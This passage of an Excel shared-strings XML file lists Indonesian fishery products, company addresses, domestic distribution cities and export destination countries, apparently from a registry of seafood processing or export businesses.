    <t>Ikan Pelagis Beku (Layaran, Sarden, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Surabaya</t>
  </si>
  <si>
    <t>Australia, China, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Katamba, Lencam, Sebelah, Kerapu, Layur, Sukang, Kakatua, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Australia, China, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Utara, Kota Surabaya</t>
  </si>
  <si>
    <t>Australia, China, Korea, Democratic People's Republic of, Korea, Republic of, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Australia, China, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Kapasa Raya No.34, Kel. Kapasa, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Abalone Kering</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok D/6, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Sukabumi, Kabupaten Bandung, Kabupaten Bekasi</t>
  </si>
  <si>
    <t>Kel. Manembo Nembo, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Panni, Tongkol, Malalugis, Maesang, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Salem)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Utara, Kabupaten Karawang, Kota Bogor, Kota Sukabumi, Kota Bekasi</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku  (Tempura, Ikan Berlapis Tepung, Kabayaki, Katsu, Siomay, Karage, Burger, Otak-otak, Naget, Bakso, Pempek) </t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Utara, Kabupaten Bandung, Kota Bogor, Kota Bekasi, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Brunei Darussalam, Japan, Malaysia, Philippines, Saudi Arabia, Singapore, Thailand, United Arab Emirates, United States</t>
  </si>
  <si>
    <t>Kawasan Greenland International Industrial Center (GIIC) Blok CF No.7 Kota Deltamas, Kel. Pasir Ranji, Kec. Cikarang Pusat, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Tepung Udang</t>
  </si>
  <si>
    <t>Kecap Udang</t>
  </si>
  <si>
    <t>Ekstrak Udang</t>
  </si>
  <si>
    <t>Tepung Krill</t>
  </si>
  <si>
    <t>Japan, Singapore, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Ekstrak Krill</t>
  </si>
  <si>
    <t>Minyak Perisa Udang</t>
  </si>
  <si>
    <t>Krill Beku</t>
  </si>
  <si>
    <t>Kompleks Pelabuhan Perikanan Samudera Jl. Samudera No. 1, Kel. Puday, Kec. Abeli, Kota Kendari&lt;br&gt;Sulawesi Tenggara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Kakatua, Kakap, Layur)</t>
  </si>
  <si>
    <t>Kota Medan, Kota Jakarta Utara, Kabupaten Pasuruan, Kabupaten Sidoarjo, Kota Surabaya</t>
  </si>
  <si>
    <t>Ruko Prancis 77 Blok A1 Jl. Raya Prancis, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Layur, Kakatua, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Marlin, Tenggiri, Kuro)</t>
  </si>
  <si>
    <t>Ikan Demersal Hidup (Kerapu, Kakatua, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Dk. Ringinsari RT 03 RW 02, Kel. Randusari, Kec. Teras, Kabupaten Boyolali&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Kabupaten Boyolali, Kabupaten Semarang, Kota Magelang, Kota Surakarta, Kota Salatiga, Kota Semarang, Kota Yogyakarta</t>
  </si>
  <si>
    <t>Jl. Husein Sastranegara Komplek Pergudangan Nusa Indah B/37 RT 004 RW 003, Kel. Jurumudi, Kec. Benda, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Jl. Strat 2 RT 17 No.30, Kel. Gunung Samarinda, Kec. Balikpapan Utara, Kota Balikpapan&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Alu-Alu, Julung-Julung, Kembung, Kuring, Makerel, Lemadang, Marlin, Meka, Makerel Pasifik)</t>
  </si>
  <si>
    <t>Australia, China, Italy, Malaysia, Portugal, Singapore, Thailand, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Bawal Hitam, Malong, Kerisi, Gulama, Emperor, Sebelah, Senangin, Pisang-Pisang, Kuwe)</t>
  </si>
  <si>
    <t>Jl. Agung Karya IV Blok B No.22, Kel. Papanggo, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Barakuda, Malong, Sebelah, Kerapu, Gerot-gerot, Layur, Monkfish, Sarden, Cakalang, Kakap, Baronang, Pari, Kurisi, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Gindara, Sarden, Ekor Kuning)</t>
  </si>
  <si>
    <t>Hati Ikan Segar</t>
  </si>
  <si>
    <t>Hati Ikan Beku</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Amberjack, Salem, Sarden, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Salem, Pollock)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Sidoarjo, Kabupaten Lamongan, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya, Kota Bitung, Kota Kendari</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Banyuwangi, Kabupaten Sidoarjo, Kabupaten Lamongan, Kabupaten Gresik, Kota Bitung, Kota Kendari</t>
  </si>
  <si>
    <t>China, Malawi, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Utara, Kabupaten Sidoarjo, Kabupaten Lamongan, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya, Kota Denpasar, Kota Bitung, Kota Kendari</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Sidoarjo, Kabupaten Pamekasan, Kabupaten Sumenep, Kota Surabaya, Kota Bitung, Kota Kendari</t>
  </si>
  <si>
    <t>Jl. Margomulyo 4E, Kel. Tandes, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Canada, France, Hong Kong, Japan, Malaysia, Netherlands, Singapore, Thailand, United Kingdom, United States</t>
  </si>
  <si>
    <t>Seafood Bernilai Tambah Rebus Beku (Ultimate Pure &amp; Simple, Crab House Retail, Bistro, Pub Style, Savory Bay)</t>
  </si>
  <si>
    <t>Seafood Bernilai Tambah Mentah Beku (Stuffed Imperials Crab Shells, Crab House Seafood)</t>
  </si>
  <si>
    <t>Belgium, Canada, Denmark, Netherlands, United States</t>
  </si>
  <si>
    <t>Jl. Sisingamangaraja Ujung No.16, Kel. Lampulo, Kec. Kuta Alam, Kota Banda Aceh&lt;br&gt;Aceh</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Deho, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Kota Medan, Kota Bandar Lampung, Kota Jakarta Utara, Kota Surabaya</t>
  </si>
  <si>
    <t xml:space="preserve"> Jl. Muara Baru RT 22 RW 17 Room 3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Layur, Kakap, Samge)</t>
  </si>
  <si>
    <t>Kampung Mandiri, Kec. Dente Teladas, Kabupaten Tulangbawang&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t>Germany, Japan, Netherlands, United Kingdom, United States</t>
  </si>
  <si>
    <t>Pergudangan Mutiara Kosambi I Blok A2 No.7, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Salem, Sarden, Selar, Cakalang)</t>
  </si>
  <si>
    <t>China, Japan, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Green Lake Boulevard Rukan Greatwall B37 RT 003 RW 008, Kel. Petir, Kec. Cipondoh, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Medan, Kabupaten Belitung, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Kupang, Kota Pontianak, Kota Balikpapan, Kota Samarinda, Kota Manado, Kota Makassar, Kota Ambon</t>
  </si>
  <si>
    <t>Kota Medan, Kabupaten Belitung, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Kupang, Kota Manado, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Salem, Saba Mackerel, Sarden)</t>
  </si>
  <si>
    <t>Kota Medan, Kabupaten Belitung, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Kupang, Kota Pontianak, Kota Balikpapan, Kota Samarinda, Kota Manado, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Lemuru, Salem, Saba Mackerel, Sarden)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Amberjack, Kod, Ekor Kuning)</t>
  </si>
  <si>
    <t>Kota Medan, Kabupaten Belitung, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Bandung, Kota Surakarta, Kota Semarang, Kota Kupang, Kota Pontianak, Kota Balikpapan, Kota Samarinda, Kota Manado, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Amberjack, Kod, Ekor Kuning)</t>
  </si>
  <si>
    <t>Kota Medan, Kabupaten Belitung, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Pontianak, Kota Balikpapan, Kota Samarinda, Kota Manado, Kota Makassar</t>
  </si>
  <si>
    <t>Kota Medan, Kabupaten Belitung, Kota Jakarta Pusat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Kupang, Kota Pontianak, Kota Balikpapan, Kota Samarinda, Kota Manado, Kota Bitung, Kota Makassar</t>
  </si>
  <si>
    <t>Jl. Pendopo No. 07 Sembayat, Kel. Sembayat, Kec. Manyar, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kabupaten Malang, Kabupaten Gresik</t>
  </si>
  <si>
    <t>Jl. A. Yani No.24, Kel. Kampung Baru, Kec. Sorong Kota, Kota Sorong&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal, Gulama, Lencam, Manyung, Kerapu, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Australia, Hong Kong, Japan, Korea, Republic of, United States</t>
  </si>
  <si>
    <t>Australia, Hong Kong, Japan, Korea, Republic of, Thailand, United States</t>
  </si>
  <si>
    <t>Jl. Rembang Industri II No.34, Kawasan Industri Rembang (PIER), Kel. Pejangkungan, Kec. Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Hasil Budidaya Beku (Gurami, Bandeng, Patin, Nila)</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Sidoarjo, Kota Surabaya, Kabupaten Tangerang, Kota Denpasar</t>
  </si>
  <si>
    <t>Australia, China, Saudi Arabia</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal, Malong, Gulama, Talang-talang, Kakap, Ekor Kuning)</t>
  </si>
  <si>
    <t>Kabupaten Belitung, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Senangin, Tenggiri, Parang-parang)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Senangin, Tenggiri, Parang-parang)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Barramundi, Bawal, Gulama, Sembilang, Sebelah, Manyung, Kerapu, Jenaha, Kakap, Ekor Kuning)</t>
  </si>
  <si>
    <t>Kota Bitung, Kel. Manembo Nembo, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Kembung, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Kabupaten Pasuruan, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Swanggi, Bawal Hitam, Gabus Laut, Gulama, Lencam, Sebelah, Manyung, Biji Nangka, Kerapu, Gerot-Gerot, Layur, Beloso, Lemadang, Kakatua)</t>
  </si>
  <si>
    <t>Australia, China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Kawasan Industri Jatake, Jl. Industri Raya II Blok J No.5, Kel. Pasir Jaya, Kec. Jatiuwung, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Jl. Husein Sastranegara No.109 Room 15, Kel. Benda, Kec. Benda, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Bogor, Kota Bandung, Kota Surabaya, Kota Tangerang, Kota Tangerang Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Bogor, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Tangerang, Kota Tangerang Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Jakarta Utara, Kota Bekasi</t>
  </si>
  <si>
    <t>Bokesan, Kel. Sindumartani, Kec. Ngemplak, Kab. Sleman&lt;br&gt;Daerah Istimewa Yogyakarta</t>
  </si>
  <si>
    <t>Stik Lele</t>
  </si>
  <si>
    <t>Kota Surakarta, Kabupaten Bantul, Kabupaten Sleman, Kota Yogyakarta</t>
  </si>
  <si>
    <t>Jl. Raya Kilongan Km 5, Kel. Kilongan, Kec. Luwuk Utara, Kabupaten Banggai&lt;br&gt;Sulawesi Tengah</t>
  </si>
  <si>
    <t>China, Thailand, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Kerapu, Layur, Sukang, Beloso, Kakatua, Bawal, Talang-talang, Jenggot, Kakap, Tonang, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Deho, Makerel, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Lencam, Kerapu, Layur, Sukang, Beloso, Kakatua, Bawal, Talang-talang, Jenggot, Kakap, Tonang, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Lemuru, Tembang, Layur, Kembung, Lemadang, Belanak, Selar, Selar Kuning, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Surabaya, Kota Tangerang</t>
  </si>
  <si>
    <t>Komplek Duta Indah Iconic Unit C 41 - 42, Jl. MH Thamrin Kebon Nanas RT 004 RW 002, Kel. Panunggangan Utara, Kec. Pinang, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kabupaten Karawang, Kabupaten Bekasi, Kota Bekasi, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Barakuda, Cobia, Marlin, Meka, Gindara, Layaran, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Kuwe, Kerapu, Layur, Kakatua, Bawal, Samge, Kakap, Kuro)</t>
  </si>
  <si>
    <t>Jl. Letkol Sarofi Lrg II Pasar Serdang, Kel. Serdang Jaya, Kec. Betara, Kabupaten Tanjung Jabung Barat&lt;br&gt;Jambi</t>
  </si>
  <si>
    <t>Blok Sirawa RT 001 RW 005, Kel. Grogol, Kec. Gunung Jati, Kabupaten Cirebon&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Kuwe, Kembung, Samge, Kuro, Salem)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Mata Goyang, Bawal Hitam, Kambing-Kambing, Remang, Layur, Kakap)</t>
  </si>
  <si>
    <t>Penambulai, Desa Warabal, Kec. Aru Tengah Selatan, Kabupaten Kepulauan Aru&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Gulama, Kerapu, Lencam, Sebelah, Layur)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Barakuda, Escolar, Lemadang)</t>
  </si>
  <si>
    <t>Jl. Kapten Rahmad Budin Link 14, Kel. Terjun, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Jl. Raya Karanggan RT 001 RW 003, Kel. Puspasari, Kec. Citeureup, Kabupaten Bogor&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Flounder, Pollock)</t>
  </si>
  <si>
    <t>Tiram Beku</t>
  </si>
  <si>
    <t>Cumi-cumi Kering</t>
  </si>
  <si>
    <t>Sea Squirt Beku</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Atka Makerel, Makerel, Pacific Saury, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. KIG Raya Selatan Kav. C-7, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Bandung, Kota Surabaya, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bekasi, Kota Bandung, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Jl. Perikanan Barek Motor No.58 RT 003 RW 008, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Australia, China, Malaysia, Singapore</t>
  </si>
  <si>
    <t>Jl. Kurau RT 16, Kel. Juata Laut, Kec. Tarakan Utara, Kota Tarakan&lt;br&gt;Kalimantan Utara</t>
  </si>
  <si>
    <t>Cold Storage Sadeng, Kel. Songbanyu, Kec. Girisubo, Kabupaten Gunung Kidul&lt;br&gt;Daerah Istimewa Yogyakarta</t>
  </si>
  <si>
    <t>Kabupaten Cilacap</t>
  </si>
  <si>
    <t>Abalone Beku</t>
  </si>
  <si>
    <t>Australia, China, Singapore</t>
  </si>
  <si>
    <t>Australia, Philippines, Singapore</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kabupaten Kulon Progo, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sleman, Kota Yogyakarta, Kota Surabaya</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kabupaten Semarang, Kabupaten Kulon Progo, Kabupaten Bantul, Kabupaten Gunung Kidul, Kabupaten Sleman, Kota Yogyakarta, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Kapasa Raya No. 38A, Kel. Kapasa, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Democratic People's Republic of, Korea, Republic of</t>
  </si>
  <si>
    <t>Jl. Trans, Desa Ureng, Kec. Leihitu, Kabupaten Maluku Tengah&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Layur, Kakatua, Bawal, Kakap, Barramundi)</t>
  </si>
  <si>
    <t>Hong Kong, Saudi Arabia</t>
  </si>
  <si>
    <t>Jl. Gatot Subroto No.46, Kel. Bulusan, Kec. Kalipuro, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Salmon Mentah Beku</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Bawal, Kakap Merah, Kod, Doversole)</t>
  </si>
  <si>
    <t>Jl. Jenggolo II/17, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Sambal Teri</t>
  </si>
  <si>
    <t>Brunei Darussalam, Canada, China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Netherlands, Saudi Arabia, Singapore, Taiwan, Province of China, United States</t>
  </si>
  <si>
    <t>Jl. Berbek Industri 5 No. 1, Kel. Berbek, Kec. Waru, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Netherlands, Portugal, United States</t>
  </si>
  <si>
    <t>Jl. Syarif Hidayatullah RT 02, Kel. Tungkal II, Kec. Tungkal Ilir, Kabupaten Tanjung Jabung Barat&lt;br&gt;Jambi</t>
  </si>
  <si>
    <t>Germany, Japan, Netherlands, United States, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Pergudangan Mutiara Kosambi I Blok A2 No. 8, Kel. Kosambi, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>China, India, Japan, Korea, Democratic People's Republic of, Korea, Republic of, Malaysia, Oman, Pakistan, Philippines, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Layur, Bawal, Kakap, Ekor Kuning)</t>
  </si>
  <si>
    <t>Jl. Raya Cileungsi RT 016 RW 005, Kel. Kembang Kuning, Kec. Klapanunggal, Kabupaten Bogor&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Jl. Raya Cileungsi RT 016 RW 005, Kel. Kembang Kuning, Kec. Klapanunggal , Kabupaten Bogor&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Kabupaten Bintan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Manyung, Kerapu, Bawal, Pepetek, Kakap Merah, Kurisi)</t>
  </si>
  <si>
    <t>Desa Panamboang, Kec. Bacan Selatan, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Cobia, Malalugis, Marlin, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Emperor, Flounder, Kerapu, Kakatua, Bawal, Kakap, Barramundi)</t>
  </si>
  <si>
    <t>Kampung Pisang Sukatani RT 002 RW 010, Kel. Karang Sari, Kec. Neglasari, Kota Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Kota Medan, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok, Kota Semarang, Kota Surabaya, Kota Tangerang, Kota Denpasar, Kota Makassar</t>
  </si>
  <si>
    <t>Kota Medan, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Semarang, Kota Surabaya, Kota Denpasar, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Air Tawar Hidup (Betutu, Bandeng, Nila, Mas, Patin, Lele)</t>
  </si>
  <si>
    <t>Ikan Air Tawar Segar (Betutu, Bandeng, Nila, Mas, Patin, Lele)</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Malaysia, Philippines, Viet Nam</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Malaysia, Philippines, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Malaysia, Philippines, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Daeng Salili No.17A RT 01 RW 01, Kel. Kampung Bugis, Kec. Tanjungpinang Kota, Kota Tanjung Pinang&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Cephalopoda Beku (Sotong, Cumi-cumi, Gurita)</t>
  </si>
  <si>
    <t>Kabupaten Karimun, Kabupaten Bintan, Kota Batam, Kota Tanjung Pinang</t>
  </si>
  <si>
    <t>Cephalopoda Segar (Sotong, Cumi-cumi, Gurita)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Gulama, Lencam, Sebelah, Manyung)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakap Putih, Gulama, Lencam, Sebelah, Manyung)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Mata Besar, Tongkol, Julung-Julung, Kembung)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Lemuru, Mata Besar, Tongkol, Julung-Julung, Kembung)</t>
  </si>
  <si>
    <t>China, Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Komplek Industri Ragam Jemundo BB 11, Kel. Jemundo, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ginseng Laut</t>
  </si>
  <si>
    <t>Korea, Republic of</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Lemuru, Tongkol, Sarden, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Barramundi, Kerapu, Kakatua, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Malaysia, Philippines, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Poros Lasalimu, Kel. Wakoko, Kec. Pasar Wajo, Kabupaten Buton&lt;br&gt;Sulawesi Tenggara</t>
  </si>
  <si>
    <t>Madidir Weru Lingkungan IV, Kel. Madidir Weru, Kec. Bitung Tengah, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Kota Tangerang, Kota Denpasar, Kota Makassar</t>
  </si>
  <si>
    <t>Jl. P. Nusa Barung Komp Niaga Malindo No.3A KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Jl. Noari Pelabuhan Perikanan Nusantara Merauke, Kel. Karang Indah, Kec. Merauke, Kabupaten Merauke&lt;br&gt;Papua</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap, Mata Besar, Kuro)</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Mujair, Otek, Gabus)</t>
  </si>
  <si>
    <t>Dusun Krajan 1 RT 03 RW 05, Kel. Bangsring, Kec. Wongsorejo, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Pemuda No 168, Kel. Tirta Siak, Kec. Payung Sekaki, Kota Pekanbaru&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>Kabupaten Rokan Hilir</t>
  </si>
  <si>
    <t>Kota Pekanbaru, Kota Jakarta Pusat</t>
  </si>
  <si>
    <t>Ikan Air Tawar Segar (Lele, Mas, Gurami, Patin, Nila)</t>
  </si>
  <si>
    <t>Ikan Air Tawar Hidup</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Lele, Mas, Gurami, Patin, Nila)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Senangin)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Senangin)</t>
  </si>
  <si>
    <t>Jl. Hang Tuah No.79, Kel. Bajomulyo, Kec. Juwana, Kabupaten Pati&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Barakuda, Tongkol, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Jakarta Utara, Kota Semarang</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Jahan, Manyung, Benggol)</t>
  </si>
  <si>
